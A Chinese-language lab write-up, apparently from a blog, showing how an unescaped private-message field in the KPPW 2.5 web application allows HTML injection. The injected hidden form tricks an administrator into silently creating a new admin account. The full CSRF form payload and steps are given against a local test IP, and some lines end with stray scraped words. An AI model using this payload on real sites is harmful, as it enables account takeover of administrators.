http://192.168.50.157/kppw25/index.php?do=user&view=message&op=send
收件人填目標用戶名,標題隨便,內容沒有轉義 ,因此提交內容處可能存在xss,不過過濾了敏感標籤和 onerror onload等事件。雖然不能加載js代碼,可是仍是能夠注入html代碼,能夠用xss漏洞注入html代碼觸發csrfphp
http://192.168.50.157/kppw25/index.php?do=user&view=message&op=send
收件人填寫admin(網站管理員),向管理員提交私信,內容爲咱們構造的html代碼html
<form action="http://192.168.50.157/kppw25/admin/index.php?do=user&view=add&edituid= " method="post"> <input type=hidden name="edituid" value=""> <input type=hidden name="fds[username]" value="qianlan"> <input type=hidden name="fds[truename]" value=""> <input type=hidden name="fds[phone]" value=""> <input type=hidden name="fds[qq]" value=""> <input type=hidden name="fds[indus_pid]" value=""> <input type=hidden name="fds[indus_id]" value=""> <input type=hidden name="fds[birthday]" value=""> <input type=hidden name="fds[password]" value="newadmin"> <input type=hidden name="fds[email]" value="x@q.c"> <input type=hidden name="fds[group_id]" value="1"> <input type="submit" name="is_submit" value="1"> </form>
http://192.168.50.157/kppw25/admin/index.php?do=user&view=add&edituid=
這個url是後臺管理員添加用戶的url,咱們構造表單,action的值設爲這個url,寫幾個隱藏表單誘使管理員去點擊提交,就會以管理員的身份去添加一個新的管理員,固然這不是網站管理員的意願,而是咱們的web
提交完成後退出當前網站用戶,模擬管理員登錄查看私信,能夠看到一個按鈕,單單一個按鈕,看到的人總會想着去點一下,固然這個按鈕能夠構造的更具備吸引力xss
當點擊按鈕事後,管理員就會在不知情的狀況下發起添加用戶的http請求去添加一個用戶名爲qianlan密碼爲newadmin的用戶,固然這是咱們構造的,看用戶列表能夠看到多了一個名爲qianlan的用戶,咱們登錄一下能夠成功進入後臺,進行下一步的滲透post
參考連接(http://lawlietweb.com/2018/01/12/KPPW25xss/)網站